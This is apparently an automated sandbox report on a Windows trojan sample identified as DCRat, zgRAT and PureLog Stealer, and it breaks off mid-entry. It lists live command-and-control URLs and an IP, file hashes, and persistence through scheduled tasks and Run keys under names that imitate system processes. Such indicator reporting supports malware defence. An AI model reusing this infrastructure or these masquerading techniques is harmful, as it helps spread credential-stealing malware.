                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe88%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe55%VirustotalBrowse
                                    C:\Recovery\csrss.exe88%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Recovery\csrss.exe55%VirustotalBrowse
                                    C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe88%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe55%VirustotalBrowse
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe88%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe55%VirustotalBrowse
                                    C:\Users\user\Desktop\RypOpByW.log8%ReversingLabs
                                    C:\Users\user\Desktop\RypOpByW.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\UjoVbfCg.log8%ReversingLabs
                                    C:\Users\user\Desktop\UjoVbfCg.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\Vmjnufha.log25%ReversingLabs
                                    C:\Users\user\Desktop\Vmjnufha.log29%VirustotalBrowse
                                    C:\Users\user\Desktop\WuLVbyih.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\WuLVbyih.log27%VirustotalBrowse
                                    C:\Users\user\Desktop\ZcxEZvOD.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\ZcxEZvOD.log27%VirustotalBrowse
                                    C:\Users\user\Desktop\bQCMLIKB.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\bQCMLIKB.log22%VirustotalBrowse
                                    C:\Users\user\Desktop\cQVCqZDT.log25%ReversingLabs
                                    C:\Users\user\Desktop\cQVCqZDT.log29%VirustotalBrowse
                                    C:\Users\user\Desktop\fXTLLrxO.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\fXTLLrxO.log22%VirustotalBrowse
                                    C:\Users\user\Desktop\mVSSSdRf.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\mVSSSdRf.log69%VirustotalBrowse
                                    C:\Users\user\Desktop\wekqfedd.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\wekqfedd.log69%VirustotalBrowse

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    SourceDetectionScannerLabelLink
                                    373292cm.nyashka.top19%VirustotalBrowse

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                                    http://www.enigmaprotector.com/openU0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top19%VirustotalBrowse
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                                    http://373292cm.nyashka.top100%Avira URL Cloudmalware
                                    http://www.enigmaprotector.com/openU0%VirustotalBrowse
                                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                                    http://www.enigmaprotector.com/0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php100%Avira URL Cloudmalware
                                    http://373292cm.nyashka.top/100%Avira URL Cloudmalware
                                    http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php18%VirustotalBrowse
                                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                                    http://373292cm.nyashka.top/19%VirustotalBrowse
                                    http://www.enigmaprotector.com/0%VirustotalBrowse
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    373292cm.nyashka.top
                                    		80.211.144.156
                                    		truetrueunknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phptrue
                                    • 18%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ac.ecosia.org/autocomplete?q=yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabyxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoyxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://373292cm.nyashka.topyxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003582000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmptrue
                                    • 19%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchyxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.enigmaprotector.com/openUInternal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://373292cm.nyashka.top/yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmptrue
                                    • 19%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.enigmaprotector.com/Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.ecosia.org/newtab/yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    80.211.144.156
                                    		373292cm.nyashka.topItaly
                                    		31034ARUBA-ASNITtrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1498678
                                    Start date and time:2024-08-25 15:44:06 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 43s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:46
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Internal.exe
                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.expl.evad.winEXE@52/68@1/1
                                    EGA Information:
                                    • Successful, ratio: 33.3%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe, StartMenuExperienceHost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target AgentMonitor.exe, PID 5612 because it is empty
                                    • Execution Graph export aborted for target AgentMonitor.exe, PID 5904 because it is empty
                                    • Execution Graph export aborted for target WmiPrvSE.exe, PID 4032 because it is empty
                                    • Execution Graph export aborted for target csrss.exe, PID 2920 because it is empty
                                    • Execution Graph export aborted for target csrss.exe, PID 6856 because it is empty
                                    • Execution Graph export aborted for target yxeaYbTPMzNPCanFqSswYWhX.exe, PID 4788 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:45:44API Interceptor201933x Sleep call for process: yxeaYbTPMzNPCanFqSswYWhX.exe modified
                                    15:45:34Task SchedulerRun new task: yxeaYbTPMzNPCanFqSswYWhX path: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    15:45:34Task SchedulerRun new task: yxeaYbTPMzNPCanFqSswYWhXy path: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    15:45:37Task SchedulerRun new task: AgentMonitor path: "C:\Blockcomcrt\AgentMonitor.exe"
                                    15:45:37Task SchedulerRun new task: AgentMonitorA path: "C:\Blockcomcrt\AgentMonitor.exe"
                                    15:45:37Task SchedulerRun new task: csrss path: "C:\Recovery\csrss.exe"
                                    15:45:37Task SchedulerRun new task: csrssc path: "C:\Recovery\csrss.exe"
                                    15:45:37Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
                                    15:45:37Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
                                    15:45:37Task SchedulerRun new task: WmiPrvSE path: "C:\Blockcomcrt\WmiPrvSE.exe"
                                    15:45:37Task SchedulerRun new task: WmiPrvSEW path: "C:\Blockcomcrt\WmiPrvSE.exe"
                                    15:45:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX "C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    15:45:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Blockcomcrt\WmiPrvSE.exe"
                                    15:45:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Recovery\csrss.exe"
                                    15:46:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
                                    15:46:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AgentMonitor "C:\Blockcomcrt\AgentMonitor.exe"
                                    15:46:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX "C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    15:46:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Blockcomcrt\WmiPrvSE.exe"
                                    15:46:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Recovery\csrss.exe"
                                    15:46:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
                                    15:46:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AgentMonitor "C:\Blockcomcrt\AgentMonitor.exe"
                                    15:47:00AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX "C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    15:47:09AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Blockcomcrt\WmiPrvSE.exe"

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    80.211.144.156Fatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Nerolore.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 973800cm.nyashsens.top/SecureBigloadServerDefaulttestdlepublic.php
                                    SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 572335cm.n9sh.top/CpuserverAsyncuniversal.php
                                    BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • fizika.top/vmphp_geoUpdateProtectBasecdn.php
                                    loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                                    MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                                    • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                                    b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 951499cm.nyashtech.top/sqlcentralUploads.php
                                    cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 389075cm.n9sh.top/tolowProcessserverwindowsFlowertesttrackWpUploads.php
                                    A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 951499cm.nyashtech.top/sqlcentralUploads.php

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    373292cm.nyashka.topFatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    Nerolore.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    jW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ARUBA-ASNITFatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    Nerolore.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                                    • 80.211.144.156
                                    b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Blockcomcrt\24dbde2999530e

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (828), with no line terminators
                                    Category:dropped
                                    Size (bytes):828
                                    Entropy (8bit):5.907388885418277
                                    Encrypted:false
                                    SSDEEP:12:rvdWTsc7Kne+oljBCkr7XFYz+wxLGtnWutaeTFAfRWE8cYvWOfAA0et7dYYD8:rdW4n3olskXoGImRRATtYJfJ3tZl4
                                    MD5:3E42F41AD20FF4720C45648AA467C704
                                    SHA1:871AB8BA56204918147DBD61E9880B6CA095B134
                                    SHA-256:DAD30EC481D6F6C1C985142C1771633161F35EF53D9883822706B8F2323E93B0
                                    SHA-512:273952F5F69D049FFFFC64F5FEDFDFC4955795626C22084A91C568E19808D68398D70806C41D0598F6D7B1C81428FD9614CCF2181388CB221933254A20CDD384
                                    Malicious:false
                                    Preview:PdJzHcrU0Xoczl0LPPNceFkGRt1rwAJxqu79zYpb21Al7MrNy1b0TrUJ3DiYkAh0N1wEo0W0kwjmF9IEBn24jSe9ZxGv0Q01TKXGanj7ekQhHsE45dX6HmR5Wwo0uk9T5sS5lCoYE5Z8C71rsM0X33uq2ctn8sN3l6lZZJS2y82MMS2Y57HiumaC8mCJSBaWsgWFWcSj37i4BhdjjVsBkpJ9gjbxGJjxifeq6xCcpiowDgBaIck7SYvCWXjwBfduYuVfDwnvSPWCAW5AhAonimeJubUiOPbJE3YTKfWVyypDCtBAbiOA0zLvPLvlcFhCxM7H7mzCnTzu6bGAZTHpAaTPrmD8uv2tQnP0v4CztMXhAazyEuMI82BX2sZUi1R2aFeTLQOeRR6xDwPQxP3AitvYl28DfrQ15eG46fmyfr1q6NTGcIhT7QTqUFsTSL9jBE2ipVURnEe11FcYi1kWK73oKaj1xSgUrSo1VuaHyPp2wcyPnUvakmYELNYOvceUiJJjalCxbci5RA2rlUNdhGuE4kqHWLWVvVUmTPzCR89HEdwKVqmaPAxcZEoz44aPGMJ6qPYWfLMjHnAaxfwqi6Guh2NOk9HWhtA1T0eFRQ5DyOUvEOCZIuqKGZYxBKwgE0BXmJH7BqYSAD6ThcKW7sNwD0v4cqEHdY98M7J5GFXbWXJDcFQjAajVmPTvXMeVmRymD8GjSPP2UvaqrrcXZfHDznW7oXh3kCzEih9d8qQuKrB0ynEquH5GKuwamJ54sVRS6VHKs8ZtOW3IlfIBT1JcHt4yuj1yuVCzZt3cf47wsL2x1nyGA4l1MzKN

                                    C:\Blockcomcrt\AgentMonitor.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\Internal.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~

                                    C:\Blockcomcrt\WmiPrvSE.exe

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~

                                    C:\Blockcomcrt\e846ec9263a131

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (878), with no line terminators
                                    Category:dropped
                                    Size (bytes):878
                                    Entropy (8bit):5.883637676410847
                                    Encrypted:false
                                    SSDEEP:24:M9NVrvaBdtaujQ/siNYKerMVd+uPasKd8e84ag:M1raBvu/bWMVjDOpPag
                                    MD5:2624F8ABC2D12D51CE111D8E3D6DCB6F
                                    SHA1:D4483E691C09B6C7604FC46937B2DD36D6159A2A
                                    SHA-256:979917C69DFCFF970A39D72D90F3A0DD7C7EC027A4EB8B2F3B072465405E7DF7
                                    SHA-512:A2DE6E751FED1B45D14708B05E973218422B7E3844BA8600146589651266CD32618AD4E31C481AA9DD291216636FE49AF92E6A864378B910778B14A5B64AB2F8
                                    Malicious:false
                                    Preview:Yrzw1h2nLcMsvvX0dx9RWTXYxKza1cYsY0vbXk1H8t4K12zjFmmQdLfEUb8rsbvsDeT595d251TnZMh4UPVO0IOMUrG6mKZg7LGXj4kKJtUl22pH4DWcGh25PGlRygQvcwpNGJVapKEHxnUbB9Cjy6aZTLHcTTVndjIGMcBur5x5dvIlwJPzeq7gWQ34B3HWzbnNfOPj7R12Je6iDgqKDfIwlmt6iGsyybGBH4Gi3q1MzEW2TU1fN6STS1l3eSB0jDEsX4bJaHQXo57hP1nNPMl1IwsQSNDlpAnvAoeY3rFFq5pX3EompxlWbMjlLK1NDpsnSLgkXOUhHgLMGVWNib51ZQTyF3Ms02BANCFrhDPacDP5BWe0xnomt0NC2sedClrOeK9EQppfLeZWAXxsYW5MOYQXzDzzivY1WBb0XZkI8JbOb1Be5wFpqeAG3mPNz06ZGhA966V8wwOF7C58BU3wqsL1AV6uKWSINBI31Ci8aG33Q5J1qRLe6JtXVI8lAlyZdF153CH8w4VkzSlFMED3KxMDSvisD68zSeZKDN8oKNrBxIiDg3Z5h4Op3ymIdY406gSU2bB8GZt7GKPKNeLKhDSXQtRPl0KvS1FR0NKF1azHKQjsic49MuS3N4EIJwWQO7pOF8T9TGSHNKM9KiqJ5LjhjLD6IC5FDj3NkVmjI4pGbLpCrF8lFNUDYHp34X1RKNDoR9Yy5GAAfdFYgAODDUAzOzzcpspvDX5OHAvsqJp8NUh4BRX3JyO0MNabK5IMbP7Ih1QfPfW3oBm4S4bYVvlPJFB4kTivAcg8XZXKB2onbVLLlfJQeu1qnr8czV467l2Leog2hQXdG8xy40TEJRQQl0Vpa4Up7sp0c9q78R

                                    C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\Internal.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):91
                                    Entropy (8bit):5.327749827173924
                                    Encrypted:false
                                    SSDEEP:3:5hc0SPGwu5cz6AidRIFpT0KkCAZ4RKb4GpJkidIA:/SGg+AiLI/fkCAZYGpqidIA
                                    MD5:BA1F17D08022238C03A0F99FB13FFBDB
                                    SHA1:B37DA583926A1786B867C0A3136D8BDBA76820E9
